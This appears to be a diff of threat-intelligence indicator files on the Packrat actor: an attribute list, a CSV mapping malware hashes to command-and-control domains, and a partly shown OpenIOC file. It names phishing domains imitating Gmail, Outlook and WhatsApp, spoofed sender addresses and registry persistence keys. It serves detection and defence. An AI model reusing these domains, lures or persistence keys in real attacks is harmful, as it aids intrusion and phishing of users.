91 9096fec9-6b26-4c94-a9a1-8bfe16caf1b5 12 Artifacts dropped md5 8e0f021dcbbfa586a1c6780e77ac0fb6 CyberGate 1 20161108
92 93541388-7cc4-436a-bf73-1e1584776a59 12 Network activity domain www.movimientoanticorreista.com 1 20161104
93 9e0ea90e-1dae-4fd3-9fe2-a95bf8ff29c7 12 Network activity ip-dst 190.210.180.181 1 20161104
94 9f3c0a52-cf4e-434c-852b-a93df8a857e1 12 Payload delivery email-src claudiobonadio88@gmail.com 1 20161108
95 9fbc655c-1010-4057-8af4-d29425574e3e 12 Artifacts dropped md5 13d939b2412c6adbab3cc1b539166671 CyberGate 1 20161108
96 a0787877-1f51-45a2-a268-99585abd3753 12 Network activity domain android-flash.com 1 20161104
97 a179e1f8-66e4-4055-a762-ed5d9166afa2 12 Artifacts dropped md5 74613eae84347183b4ca61b912a4573f AlienSpy 1 20161108
98 a38d5330-38f4-4016-a6a5-82fefed9aacd 12 Network activity domain wjwjwjwj.no-ip.org 1 20161104
99 a391d94a-2311-4420-a315-067f450915c2 12 Network activity domain ftp.ftpserver.com 1 20161104
100 a723650f-2306-48f3-a588-e57822f92448 12 Artifacts dropped regkey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Policies 1 20161104
101 a8d6eb71-318f-4516-b319-5e50d6996770 12 Artifacts dropped md5 dd1101adc86fd282f5f183942cc2f3b7 CyberGate 1 20161108
102 ab318121-5622-4ea7-aca3-59e972601644 12 Network activity domain n3.pancaliente.info 1 20161104
103 abb6b95e-2364-4aad-b826-7c925b587d0a 12 Network activity domain lavozmericana.info 1 20161104
104 abc292cf-5485-4189-8c0a-b18d830cc7f2 12 Network activity domain pancaliente.info 1 20161104
105 ac5dde92-e97e-4b57-9305-5e439f9bbb40 12 Artifacts dropped md5 ea50bf8abcf9c0c40c4490dc15fb0a2a CyberGate 1 20161108
106 aea5a3f5-d174-47c1-81a0-c97a5a478e00 12 Network activity domain n1.lavozamericana.info 1 20161104
107 b0bd3917-ba04-4d95-a5d3-928993f331a9 12 Artifacts dropped md5 a988235ad7d47acbeca5ccb4ea5a1ed5 CyberGate 1 20161108
108 b0df1407-9653-4f07-8f2e-5cd7f1c1a212 12 Network activity domain n1.update-outlook.info 1 20161104
109 b373771f-54f4-4559-8297-52779ee94c28 12 Network activity domain soporte-login-account-gmail.tk 1 20161104
110 b5b19817-6112-4eeb-b3d1-666f92b33ee7 12 Network activity domain no.response.delivery.es 1 20161104
111 b66ec73a-4faf-4873-bdd8-8fdde6207ca4 12 Network activity domain ecuadorenvivo.co 1 20161104
112 b812855c-8fdc-41f2-8857-8966aa84ea89 12 Network activity domain ruley.no-ip.org 1 20161104
113 bc40a9ee-df43-4ba3-ad9d-529dc845d04b 12 Network activity domain s2.mgoogle.us 1 20161104
114 bd9e3887-abea-465a-9f42-4ca38ea31d17 12 Artifacts dropped md5 0ae0038ffe8cf5c3170734a71ff2213d AlienSpy 1 20161108
115 c00a3cd4-3530-4a3d-a0b2-4231aad495ad 12 Network activity domain login-office365.com 1 20161104
116 c103e0dc-7fb4-4e6d-a3d1-d6dfadc90045 12 Artifacts dropped md5 08a3bb5b220eb1e0dc2ecccbbc6859f5 Adzok 1 20161108
117 c67572b2-b7f4-4f32-9e4d-a8892079fec4 12 Network activity domain wjwjwj.no-ip.org 1 20161104
118 c6f40987-2e22-495f-9fcf-ce681c67e901 12 Network activity domain daynews.sytes.net domain linked to deyrep24.ddns.net 1 20161108
119 c7d3ba98-9951-45a1-864f-ad1c6c000aad 12 Artifacts dropped regkey HKLM\SOFTWARE\Microsoft\Active 1 20161104
120 c891c678-1cf0-4842-bcec-fe93b9479a28 12 Network activity ip-dst 50.62.133.49 IP address linked to deyrep24.ddns.net 1 20161108
121 cbdf99c3-ac02-49e1-bd44-aa95c5e2acac 12 Network activity domain wjwj.no-ip.org 1 20161104
122 ced4acdc-8a7e-4766-b6c6-431b37b0e332 12 Payload delivery email-src cfed.bonadio@gmail.com Phishing source pretending to be Claudio Bonadio 1 20161108
123 cf896608-add9-45a1-8a66-8a04096b70f1 12 Network activity domain mail.asambleanacional.gob.ec 1 20161104
124 cfd9e067-855e-4c38-af7b-b1ec7b9c5e0f 12 Network activity domain support-whatsapp.com 1 20161104
125 d036cf1a-59fb-4c11-9da9-cbf99f5733a7 12 Artifacts dropped md5 ed8d7ed45b64890b8901b735018318f3 CyberGate 1 20161108
126 d605e928-93ec-4aec-897e-0de476fe3f0e 12 Network activity domain s1.support 1 20161104
127 d736d788-19c3-47d3-85ba-6f1b8a3f0897 12 Network activity ip-dst 186.220.1.84 1 20161104
128 d79f9f17-548f-4712-afdf-a8dc5dc43be1 12 Network activity domain taskmgr.servehttp.com 1 20161104
129 da13fa70-4007-4c44-b611-a890dd8b1f31 12 Artifacts dropped md5 ea7bcf58a4ccdecb0c64e56b9998a4ac Adzok 1 20161108
130 dad67427-90fd-429f-94cc-15aab9efefc7 12 Artifacts dropped md5 bc97437fec7e7e8634c2eabae3cc4832 CyberGate 1 20161108
131 e4567864-ed20-4a52-8ebc-280bb84bc259 12 Payload delivery email-src no.response.delivery.es@gmail.com 1 20161104
132 ec9d62d6-4906-45a7-a781-a4b3939e77bc 12 Network activity domain gmail.com.msg07.xyz 1 20161104
133 f4ce5713-8486-4eff-be64-f04899ad0e63 12 Network activity ip-dst 186.220.11.67 1 20161104
134 f5818138-37c1-412a-8cf7-2d7bcb538367 12 Network activity domain lavozamericana.info 1 20161104
135 f7508074-3443-4ceb-a1b6-08e87bc65b44 12 Network activity domain support-login-validate-outlook.tk 1 20161104
136 f7dbcb2a-96c1-48d9-8bda-785348f8d91b 12 Artifacts dropped md5 6c34d4296126679d9c6a0bc2660dc453 CyberGate 1 20161108
137 fd6b3ff2-e441-4bc1-ba2d-d3d9dd50ab24 12 Network activity domain ns.update-outlook.info 1 20161104

View File

@@ -0,0 +1,51 @@
MD5,,C2,Malware Family
dd1101adc86fd282f5f183942cc2f3b7,,wjwj.no-ip.org,CyberGate
dd1101adc86fd282f5f183942cc2f3b7,,ruley.no-ip.org,CyberGate
dd1101adc86fd282f5f183942cc2f3b7,,lolinha.no-ip.org,CyberGate
2d722592a4e3c8030410dccccb221ce4,,wjwj.no-ip.org,CyberGate
d2adecc6287dd4d559fe6ce2ce7a7e31,,wjwj.no-ip.org,Cybergate
d2adecc6287dd4d559fe6ce2ce7a7e31,,ruley.no-ip.org,Cybergate
d2adecc6287dd4d559fe6ce2ce7a7e31,,lolinha.no-ip.org,Cybergate
93b630891db21a4a2350280a360c713d,,wjwj.no-ip.org,CyberGate
93b630891db21a4a2350280a360c713d,,ruley.no-ip.org,CyberGate
93b630891db21a4a2350280a360c713d,,lolinha.no-ip.org,CyberGate
a73351623577f44a2b578fed1e78e37e,,ruley.no-ip.org,CyberGate
a73351623577f44a2b578fed1e78e37e,,wjwj.no-ip.org,CyberGate
5a8975873f52436377d8fb0b5ab0d87a,,ruley.no-ip.org,CyberGate
ed8d7ed45b64890b8901b735018318f3,,ruley.no-ip.org,CyberGate
ed8d7ed45b64890b8901b735018318f3,,wjwj.no-ip.org,CyberGate
c2237e9d415f542ce6e73adb260af123,,wjwj.no-ip.org,Xtreme RAT
2827450763b55c5e71fda3caaf8e75f9,,wjwj.no-ip.org,Xtreme RAT
bc97437fec7e7e8634c2eabae3cc4832,,ruley.no-ip.org,CyberGate
bc97437fec7e7e8634c2eabae3cc4832,,taskmgr.serveftp.com,CyberGate
d7f34168b1a7dd7cbd8e62a5ab1ebc0e,,taskmgr.serveftp.com,Xtreme RAT
d7f34168b1a7dd7cbd8e62a5ab1ebc0e,,taskmgr.servehttp.com,Xtreme RAT
6c34d4296126679d9c6a0bc2660dc453,,taskmgr.servehttp.com,CyberGate
6c34d4296126679d9c6a0bc2660dc453,,taskmgr.serveftp.com,CyberGate
efc0009d76a2057f86c5f00030378c72,,daynews.sytes.net,AlienSpy
74613eae84347183b4ca61b912a4573f,,daynews.sytes.net,AlienSpy
d2f151312f7dee2483ddcab9766b56db,,daynews.sytes.net,AlienSpy
ea7bcf58a4ccdecb0c64e56b9998a4ac,,daynews.sytes.net,Adzok
1e4265a0c37773c2372b97bb6630ae57,,daynews.sytes.net,Adzok
08a3bb5b220eb1e0dc2ecccbbc6859f5,,daynews.sytes.net,Adzok
2de51e74fd571319bbf763ec62781096,,deyrep24.ddns.net,AlienSpy
8fb96dfab7e4c0acb1eb9f4e950ba4b9,,deyrep24.ddns.net,AlienSpy
4a23a1d6779d199aaa582cf0a5868ad1,,deyrep24.ddns.net,Adzok
0ae0038ffe8cf5c3170734a71ff2213d,,deyrep24.ddns.net,AlienSpy
8e0f021dcbbfa586a1c6780e77ac0fb6,,taskmgr.servehttp.com,CyberGate
a74ef893b1bf21c9df6d8e31285db981,,taskmgr.servehttp.com,CyberGate
a988235ad7d47acbeca5ccb4ea5a1ed5,,taskmgr.servehttp.com,CyberGate
15ebe16cd9500de534d5bfd5eeceaf73,,taskmgr.servehttp.com,CyberGate
01dec1b1d0760d5a1a562edcfeb478d1,,taskmgr.servehttp.com,CyberGate
1e6d0b59d4fb7650453c207688385f3a,,taskmgr.servehttp.com,CyberGate
e03be1849ad7cecba1e20923074cd22f,,taskmgr.servehttp.com,CyberGate
779a79c11f581b84e7c81f321fd8d743,,conhost.servehttp.com,CyberGate
13d939b2412c6adbab3cc1b539166671,,conhost.servehttp.com,CyberGate
13d939b2412c6adbab3cc1b539166671,,dllhost.servehttp.com,CyberGate
7b2cb5249d704cb1df8d4210e7c3d553,,dllhost.servehttp.com,CyberGate
7b2cb5249d704cb1df8d4210e7c3d553,,conhost.servehttp.com,CyberGate
a09f100ddc7cf29f8a93a3d7a79c58b9,,taskmgr.servehttp.com,CyberGate
ce6065346a918a813eeb58bbb0814a23,,taskmgr.servehttp.com,CyberGate
ea50bf8abcf9c0c40c4490dc15fb0a2a,,taskmgr.servehttp.com,CyberGate
3a61d64986ee6529cee271ab6754faa5,,taskmgr.servehttp.com,CyberGate
695db7dd3b1daf89f2c56d59faecc088,,taskmgr.servehttp.com,CyberGate
1 MD5 C2 Malware Family
2 dd1101adc86fd282f5f183942cc2f3b7 wjwj.no-ip.org CyberGate
3 dd1101adc86fd282f5f183942cc2f3b7 ruley.no-ip.org CyberGate
4 dd1101adc86fd282f5f183942cc2f3b7 lolinha.no-ip.org CyberGate
5 2d722592a4e3c8030410dccccb221ce4 wjwj.no-ip.org CyberGate
6 d2adecc6287dd4d559fe6ce2ce7a7e31 wjwj.no-ip.org Cybergate
7 d2adecc6287dd4d559fe6ce2ce7a7e31 ruley.no-ip.org Cybergate
8 d2adecc6287dd4d559fe6ce2ce7a7e31 lolinha.no-ip.org Cybergate
9 93b630891db21a4a2350280a360c713d wjwj.no-ip.org CyberGate
10 93b630891db21a4a2350280a360c713d ruley.no-ip.org CyberGate
11 93b630891db21a4a2350280a360c713d lolinha.no-ip.org CyberGate
12 a73351623577f44a2b578fed1e78e37e ruley.no-ip.org CyberGate
13 a73351623577f44a2b578fed1e78e37e wjwj.no-ip.org CyberGate
14 5a8975873f52436377d8fb0b5ab0d87a ruley.no-ip.org CyberGate
15 ed8d7ed45b64890b8901b735018318f3 ruley.no-ip.org CyberGate
16 ed8d7ed45b64890b8901b735018318f3 wjwj.no-ip.org CyberGate
17 c2237e9d415f542ce6e73adb260af123 wjwj.no-ip.org Xtreme RAT
18 2827450763b55c5e71fda3caaf8e75f9 wjwj.no-ip.org Xtreme RAT
19 bc97437fec7e7e8634c2eabae3cc4832 ruley.no-ip.org CyberGate
20 bc97437fec7e7e8634c2eabae3cc4832 taskmgr.serveftp.com CyberGate
21 d7f34168b1a7dd7cbd8e62a5ab1ebc0e taskmgr.serveftp.com Xtreme RAT
22 d7f34168b1a7dd7cbd8e62a5ab1ebc0e taskmgr.servehttp.com Xtreme RAT
23 6c34d4296126679d9c6a0bc2660dc453 taskmgr.servehttp.com CyberGate
24 6c34d4296126679d9c6a0bc2660dc453 taskmgr.serveftp.com CyberGate
25 efc0009d76a2057f86c5f00030378c72 daynews.sytes.net AlienSpy
26 74613eae84347183b4ca61b912a4573f daynews.sytes.net AlienSpy
27 d2f151312f7dee2483ddcab9766b56db daynews.sytes.net AlienSpy
28 ea7bcf58a4ccdecb0c64e56b9998a4ac daynews.sytes.net Adzok
29 1e4265a0c37773c2372b97bb6630ae57 daynews.sytes.net Adzok
30 08a3bb5b220eb1e0dc2ecccbbc6859f5 daynews.sytes.net Adzok
31 2de51e74fd571319bbf763ec62781096 deyrep24.ddns.net AlienSpy
32 8fb96dfab7e4c0acb1eb9f4e950ba4b9 deyrep24.ddns.net AlienSpy
33 4a23a1d6779d199aaa582cf0a5868ad1 deyrep24.ddns.net Adzok
34 0ae0038ffe8cf5c3170734a71ff2213d deyrep24.ddns.net AlienSpy
35 8e0f021dcbbfa586a1c6780e77ac0fb6 taskmgr.servehttp.com CyberGate
36 a74ef893b1bf21c9df6d8e31285db981 taskmgr.servehttp.com CyberGate
37 a988235ad7d47acbeca5ccb4ea5a1ed5 taskmgr.servehttp.com CyberGate
38 15ebe16cd9500de534d5bfd5eeceaf73 taskmgr.servehttp.com CyberGate
39 01dec1b1d0760d5a1a562edcfeb478d1 taskmgr.servehttp.com CyberGate
40 1e6d0b59d4fb7650453c207688385f3a taskmgr.servehttp.com CyberGate
41 e03be1849ad7cecba1e20923074cd22f taskmgr.servehttp.com CyberGate
42 779a79c11f581b84e7c81f321fd8d743 conhost.servehttp.com CyberGate
43 13d939b2412c6adbab3cc1b539166671 conhost.servehttp.com CyberGate
44 13d939b2412c6adbab3cc1b539166671 dllhost.servehttp.com CyberGate
45 7b2cb5249d704cb1df8d4210e7c3d553 dllhost.servehttp.com CyberGate
46 7b2cb5249d704cb1df8d4210e7c3d553 conhost.servehttp.com CyberGate
47 a09f100ddc7cf29f8a93a3d7a79c58b9 taskmgr.servehttp.com CyberGate
48 ce6065346a918a813eeb58bbb0814a23 taskmgr.servehttp.com CyberGate
49 ea50bf8abcf9c0c40c4490dc15fb0a2a taskmgr.servehttp.com CyberGate
50 3a61d64986ee6529cee271ab6754faa5 taskmgr.servehttp.com CyberGate
51 695db7dd3b1daf89f2c56d59faecc088 taskmgr.servehttp.com CyberGate

View File

@@ -0,0 +1,533 @@
<?xml version="1.0" encoding="utf-8"?>
<ioc xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" id="581c11ef-a8c4-4c26-a4ea-49798e96ca05" last-modified="2015-12-08T00:00:00" xmlns="http://schemas.mandiant.com/2010/ioc">
<short_description>Event #12</short_description>
<description>Packrat: Seven Years of a South American Threat Actor</description>
<keywords />
<authored_by>citizenlab</authored_by>
<authored_date>2015-12-08T00:00:00</authored_date>
<links />
<definition>
<Indicator operator="OR" id="581c11ef-a8c4-4c26-a4ea-49798e96ca05">
<IndicatorItem id="a988235ad7d47acbeca5ccb4ea5a1ed5" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="15ebe16cd9500de534d5bfd5eeceaf73" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="01dec1b1d0760d5a1a562edcfeb478d1" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="1e6d0b59d4fb7650453c207688385f3a" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="e03be1849ad7cecba1e20923074cd22f" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="779a79c11f581b84e7c81f321fd8d743" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="13d939b2412c6adbab3cc1b539166671" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="7b2cb5249d704cb1df8d4210e7c3d553" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="a09f100ddc7cf29f8a93a3d7a79c58b9" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="ce6065346a918a813eeb58bbb0814a23" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="ea50bf8abcf9c0c40c4490dc15fb0a2a" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="3a61d64986ee6529cee271ab6754faa5" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="695db7dd3b1daf89f2c56d59faecc088" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="ea7bcf58a4ccdecb0c64e56b9998a4ac" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="efc0009d76a2057f86c5f00030378c72" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="74613eae84347183b4ca61b912a4573f" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="bc97437fec7e7e8634c2eabae3cc4832" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="dd1101adc86fd282f5f183942cc2f3b7" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="2d722592a4e3c8030410dccccb221ce4" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="d2adecc6287dd4d559fe6ce2ce7a7e31" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="93b630891db21a4a2350280a360c713d" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="a73351623577f44a2b578fed1e78e37e" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="5a8975873f52436377d8fb0b5ab0d87a" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="ed8d7ed45b64890b8901b735018318f3" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="c2237e9d415f542ce6e73adb260af123" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="2827450763b55c5e71fda3caaf8e75f9" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="d7f34168b1a7dd7cbd8e62a5ab1ebc0e" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="6c34d4296126679d9c6a0bc2660dc453" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="d2f151312f7dee2483ddcab9766b56db" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="1e4265a0c37773c2372b97bb6630ae57" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="08a3bb5b220eb1e0dc2ecccbbc6859f5" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="2de51e74fd571319bbf763ec62781096" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="8fb96dfab7e4c0acb1eb9f4e950ba4b9" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="4a23a1d6779d199aaa582cf0a5868ad1" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="0ae0038ffe8cf5c3170734a71ff2213d" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="8e0f021dcbbfa586a1c6780e77ac0fb6" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="a74ef893b1bf21c9df6d8e31285db981" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="HKLM\SOFTWARE\Microsoft\Active" condition="is">
<Context document="Network" search="RegistryItem/KeyPath" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Policies" condition="is">
<Context document="Network" search="RegistryItem/KeyPath" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msconfig" condition="is">
<Context document="Network" search="RegistryItem/KeyPath" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="taskmgr.redirectme.net" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="ftp.server.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="update-outlook.info" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="deyrep.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="support-whatsapp.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="blackboxmusic.co" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="www.blackboxmusic.co" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="mail-account-update.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="lavozmericana.info" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="support-java.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="n3.pancaliente.info" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="n4.pancaliente.info" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="ns1.deyrep.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="ns2.deyrep.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="n1.login-office365.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="n2.login-office365.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="n1.update-outlook.info" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="ns.update-outlook.info" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="s1.mgoogle.us" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="s2.mgoogle.us" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="support-login-validate-outlook.tk" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="verify-gmail-support-secure.tk" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="soporte-login-account-gmail.tk" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="soporte-login-account-yahoo.tk" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="n1.support-java.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="n1.lavozamericana.info" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="s1.support" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="ns1.ukraine.com.ua" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="android-flash.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="deyrep24.ddns.net" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="daynews.sytes.net" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="taskmgr.serveftp.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="taskmgr.servehttp.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="taskmgr.redirectme.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="ruley.no-ip.org" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="lolinha.no-ip.org" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="wjwj.no-ip.org" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="conhost.servehttp.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="dllhost.servehttp.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="wjwjwj.no-ip.org" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="wjwjwjwj.no-ip.org" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="ecuadorenvivo.co" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="ecuadorenvivo.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="www.movimientoanticorreista.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="focusecuador.tk" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="mesvr.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="ftp.ftpserver.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="lavozamericana.info" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="ec.cu9.co" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="movimientoanticorreista.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="mgoogle.us" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="no.response.delivery.es" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
